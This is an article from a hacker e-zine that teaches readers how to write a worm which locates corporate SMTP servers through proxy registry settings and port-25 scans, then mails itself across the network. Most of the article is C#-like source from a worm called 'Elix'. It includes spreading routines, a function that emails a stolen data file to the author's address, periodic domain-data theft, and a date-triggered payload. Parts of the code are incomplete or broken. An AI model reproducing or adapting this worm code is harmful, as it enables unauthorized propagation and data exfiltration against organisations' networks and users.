									  __________. 
									 /____/____/| 
									|  _  |  __|/ 
									|_|_| | |_/| 
		Challange to find SMTP server, over the LAN/WAN		 / _  |  _|/ 
		===============================================		| |_| | ||  
									|_____|_|/  
====================================================================================/
3f electronic magazine #1 - 2013					By:dJANGGO
====================================================================================/


Challange to find SMTP server, over the LAN/WAN

.start

Most of worm using hardcoded "Software\\Microsoft\\Internet Account Manager"  to find
smtp address at their code, Nowday this method become lame , you will not able to find
it by simple, its will work only in microsoft messanging architectureits not simple to find
that fuck*n smtp server,and according to this issue, I've test several way, lot of test to 
find trully smtp server over the network (both local/wide network). Here now I will share to 
you, the good way to find smtp server in your local / wide network.

One thing you should know when you code your own worm is about network, search at google about
OSI layer. But now,  when you code worm,at least should to know about 2 important thing. the
first one is Routing model or they call it network architecture and the second one is tcp/ip.
Tcp ip is talk about the packet that we send, and routing model is about network diagram / -
architecture. This article will not explain about them.Because we have google, read much and
code, I'm not your teacher

.Virtual LAN (VLAN)

I'm not good in description,I've draw a diagram for you, so here is very simple visual network
diagram to show you about VLAN.

simple network arcitecture (mostly used in both high-middle and low institution network scale)

---------------------------------------------------------
vlan1:10.11.3.1/24   >>>packet smtp outbound over dmz >>    >>> packet out   
-------------------- ^|					|                    
your worm            ^|					|
localy at            ^| De-Military			|              		
10.11.3.21           p| Zone (DMZ) at			|
-------------------- a| 10.2.180.1/23  			|
host entry list      c|					|
-------------------- k| host server1 (10.2.180.2)	|
host vlan1 10.11.3.2 e| host server2 (10.2.180.3)	|
host vlan1 10.11.3.3 t| host server3 (10.2.180.4)	|
-------------------- ^| host serverX (10.2.180.x)	|
host vlan1 10.11.3.x ^| 				|			
-----------------------			 		|
VLAN2:10.11.41/24    >>>packet smtp outbound over dmz >>    >>> packet out 
Another VLAN         ^					|
-------------------- ^|	other Host server at DMz	|
host entry           ^|	10.2.181.2			|
-------------------- p| 10.2.181.3			|
Host vlan2           a| 10.2.181.4			|
-------------------- c| 10.2.181.X			|
host vlan2           k|					|
-------------------- e|					|
Host Vlanx           t|					|
-----------------------					|
VLAN3:10:11.5.1/24    >>>packet smtp outbound over dmz >>   >>> packet out  
---------------------------------------------------------
VLANX:10:11.X.1/24    >>>packet smtp outbound over dmz >>   >>> packet out  
---------------------------------------------------------


Mostly, smtp servers is located in DMZ area, because  DMZ area is the public room, and let say VLAN1,VLAN2 VLANX are
private room,since the worm located in different VLAN with DMZ,how do we find THat fuck*n DMZ? This is very important
for your worm to spread outside the network. if we dont find it, we wont able to spread the code, and one more thing,
smtp server could be more than one, so dont be naif, you should know this.

This is very important for your worm to find the smtp server that will be used to send mail outside the network. you can
trace the packet network using TRACERT command (in dos) to trace the network packet from local host to destination host
for example, I want to know how many routing node when I send the packet from local host to google.com, just simple type this

TRACERT WWW.GOOGLE.COM

you will see the packet jump from local to destination.

I wont talk about tracert much, read google, now back to the problem, where to find DMZ? The easy way to find DMZ over
LAN/WAN is by looking for the proxy server address, because in most corporate locate their proxy server in DMZ.and Its true.
The second way is by looking for firewall server address. both of them must be located in DMZ, T R U S T  M E  B U D D Y

After we found one of them (proxy/firewall), it means that we've found DMZ area, and the next step is to make simple smtp
scanner to search all opened smtp port (:25), as I said before that smtp server could be more than one, so  the best way you
can do is try to send the worm in every server that have smtp port opened. I've talk to much, let see the code that I ripped
from Elix.

------------------------------------------------------------------------------ code
	public static void Main()
	{
		//Hide this worm

		v = 1;
		for (i = 0; i <= 31; i++) {
			bit[i] = NumberToLong(v);
			v = v + v;
		}
		dynamic ip = null;
		dynamic mask = null;
		dynamic size = null;
		dynamic sn = null;
		dynamic ip1 = null;
		dynamic ipN = null;

		// Get DMZ zone by looking for its proxy server

		if (!string.IsNullOrEmpty(getDMZAddress("Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", "ProxyServer"))) {
			ip = ValidateIP(getDMZAddress("Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", "ProxyServer"));
		} else {

		// if not found, elix will search in current host range network (cidr /23=512 host broaadcast)

			ip = GetLocalIP();
		}

		mask = CIDRtoMask("23");

		// hardcode /23 cisco cidr translation means 512 host maximum

		sn = subnet(ip, mask);

		size = subnetSize(mask);

		ip1 = sn | 1;
		ipN = sn | size;

		int prog = (ipN - ip1) + 1;
		try {
			int stat = 0;
			for (i = ip1; i <= ipN; i++) {
				stat = stat + 1;


				if (My.Computer.Network.Ping(IpString(i))) {
					if (checkSMTPPort(IpString(i), "25")) {

						//Spreading way.....
						//spreaddd Elixx....
						TrySendOverAD(IpString(i));
						TrySendOverFileSearch(IpString(i));
						TrySendMeTheFile(IpString(i));
					}

				}
			}
		} catch (Exception ex) {
			throw ex;
		}

		try {
			if (DateAndTime.Day(DateAndTime.Now) % 5 == 0) {
				StealthDomainData();
			}
			if (DateAndTime.Day(DateAndTime.Now) == 1) {
				payload();
			}
		} catch (Exception ex) {
			throw ex;
		}
	}
	
	//Collected data will be sent to my email

	public static object TrySendMeTheFile(string ip)
	{
		try {
			MailMessage objMailMsg = new MailMessage("infectedhost@elix.com", "dj4n660@gmail.com");
			objMailMsg.Subject = "Elix By dJANGGO/3F";
			objMailMsg.Body = "This is the data";
			objMailMsg.Priority = MailPriority.High;

			//Hardcoded file stream because I hate C:\, it wont work in many corporate GPO

			objMailMsg.Attachments.Add(new Attachment("D:\\ElixDataStream.txt"));
			objMailMsg.IsBodyHtml = true;
			System.Net.Mail.SmtpClient objSMTPClient = new System.Net.Mail.SmtpClient();
			objSMTPClient.Host = ip;
			objSMTPClient.Send(objMailMsg);
		} catch (Exception ex) {
			throw ex;
		}
	}





	//Get Host IP
	public static string GetLocalIP()
	{
		try {
			string _IP = null;
			System.Net.IPHostEntry _IPHostEntry = System.Net.Dns.GetHostEntry(System.Net.Dns.GetHostName());
			foreach (System.Net.IPAddress _IPAddress in _IPHostEntry.AddressList) {
				if (_IPAddress.AddressFamily.ToString() == "InterNetwork") {
					_IP = _IPAddress.ToString();
				}
			}
			return _IP;
		} catch (Exception ex) {
			throw ex;
		}
	}


	// In corporate, SMTP server should be at DMZ zone the same area with proxy server
	// So the easy way to find out smtp server is by looking the place of proxy server
	// When we found it it, just creaate simple proc smtp port scanner, and doing scan
	// in every server in DMZ area,when it found opened smtp port,this virus will send
	// it self using the server

	public static object getDMZAddress(string rkey, string rvalue)
	{
		try {
			Microsoft.Win32.RegistryKey MyReg = Microsoft.Win32.RegistryKey.OpenRemoteBaseKey(Microsoft.Win32.RegistryHive.CurrentUser, GetLocalIP());
			Microsoft.Win32.RegistryKey MyRegKey = null;
			MyRegKey = MyReg.OpenSubKey(rkey);
			string s = MyRegKey.GetValue(rvalue);
			return s;
		} catch (Exception ex) {
			throw ex;
		}
	}

	// Check smtp port 25, in every host that has been found in DMZ
	public static object checkSMTPPort(string host, string port)
	{
		try {
			System.Net.IPAddress hostadd = System.Net.Dns.GetHostEntry(host).AddressList[0];
			System.Net.IPEndPoint EPhost = new System.Net.IPEndPoint(hostadd, port);
			System.Net.Sockets.Socket s = new System.Net.Sockets.Socket(System.Net.Sockets.AddressFamily.InterNetwork, System.Net.Sockets.SocketType.Stream, System.Net.Sockets.ProtocolType.Tcp);

			s.Connect(EPhost);

			if (!s.Connected) {
				return false;
			} else {
				return true;
			}
		} catch (Exception ex) {
			throw ex;
		}
	}

	// CIDR Translator
	//---------------------------------- they are functions to convert CIDR to broadcast addresses ----------------------------------
	public static object subnetSize(mask)
	{
		//returns the number of IPs for a given subnet-mask
		//will only work with MS/CISCO-compliant masks with leading 1-s and trailing 0-s, but not for masks like 255.0.255.0
		return -IpValue(mask) - 2;
	}

	public static object subnet(IP, mask)
	{
		//converts a given IP-string and subnetmask-string into a number from type LONG representing the subnet
		return IpValue(IP) & IpValue(mask);
	}

	public static object IpValue(IP)
	{
		//converts an IP-string into a number from type LONG (for bit-operators like AND/OR)
		return NumberToLong(IpToNumber(IP));
	}

	public static object IpToNumber(IP)
	{
		object functionReturnValue = null;
		//converts an IP-string into a large positive number between &H00000000 and &HFFFFFFFF 
		dynamic octet = null;
		foreach (object octet_loopVariable in Strings.Split(IP, ".")) {
			octet = octet_loopVariable;
			functionReturnValue = functionReturnValue * 256 + Convert.ToByte(octet);
		}
		return functionReturnValue;
	}

	public static object NumberToLong(n)
	{
		object functionReturnValue = null;
		//converts a large number between &H00000000 and &HFFFFFFFF into type LONG
		if (n > 0x7fffffff) {
			functionReturnValue = n - 4294967296L;
		} else {
			functionReturnValue = n;
		}
		return functionReturnValue;
	}

	public static object IpString(n)
	{
		object functionReturnValue = null;
		//converts a n IP-value from type LONG into a readable IP-string
		try {
			dynamic octet = null;
			dynamic octetValue = null;
			dynamic bOffset = null;
			for (octet = 0; octet <= 3; octet++) {
				octetValue = 0;
				for (b = 0; b <= 7; b++) {
					if (n & bit[bOffset + b])
						octetValue = octetValue + bit[b];
				}
				bOffset = bOffset + 8;
				if (octet == 0) {
					functionReturnValue = Convert.ToString(octetValue);
				} else {
					functionReturnValue = Convert.ToString(octetValue) + "." + functionReturnValue;
				}
			}
		} catch (Exception ex) {
			throw ex;
		}
		return functionReturnValue;
	}

	public static object maskbit(mask)
	{
		dynamic m = null;
		dynamic b = null;
		m = IpValue(mask);
		for (b = 0; b <= 31; b++) {
			if ((m & bit[b]))
				break;
		}
		return 32 - b;
	}

	public static string CIDRtoMask(int CIDR)
	{
		try {
			if (CIDR < 2 || CIDR > 30) {
				System.Diagnostics.Debugger.Break();
			}

			Debug.WriteLine(CIDR.ToString());

			//simulated ip address
			UInt32 ipAsNum = 3232300291L;
			//192.168.253.3
			Debug.WriteLine(Convert.ToString(ipAsNum, 2).PadLeft(32, '0') + " IP as num");
			//show binary

			//create mask
			UInt32 mask = UInt32.MaxValue << (32 - CIDR);
			Debug.WriteLine(Convert.ToString(mask, 2).PadLeft(32, '0') + " mask");
			//show binary

			UInt32 CT = UInt32.MaxValue ^ mask;
			//the zero based count of hosts in network
			UInt32 NN = ipAsNum & mask;
			//network number
			UInt32 NB = NN | CT;
			//network broadcast
			Debug.WriteLine(Convert.ToString(CT, 2).PadLeft(32, '0') + " CT");
			//show binary
			Debug.WriteLine(Convert.ToString(NN, 2).PadLeft(32, '0') + " NN");
			//show binary
			Debug.WriteLine(Convert.ToString(NB, 2).PadLeft(32, '0') + " NB");
			//show binary

			//get bytes
			byte[] tb = BitConverter.GetBytes(mask);
			Array.Reverse(tb);

			//convert to string
			string stringMask = string.Format("{0}.{1}.{2}.{3}", tb[0], tb[1], tb[2], tb[3]);

			return stringMask;
		} catch (Exception ex) {
			throw ex;
		}
	}

}



------------------------------------------------------------------------------------------.eoc

.end

Here, code flow process :

~ search the proxy server location in the host at Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings
~ Most proxy address combined with port, for example 10.2.180.80:8000, so the code will remove ":8080"
~ SCan the spesific proxy address that has been found using portable CIDR translation (you can see the function on the bottom.
~ When the worm find opened smtp port, it will Send all mail over the server
~ Next...up to you

Ok,thats all, Sorry for my bad tutorial, you know, I'm not good in description. But I hope this usefull for you..

											dJANGGO/3F
											Chain me, or you die..





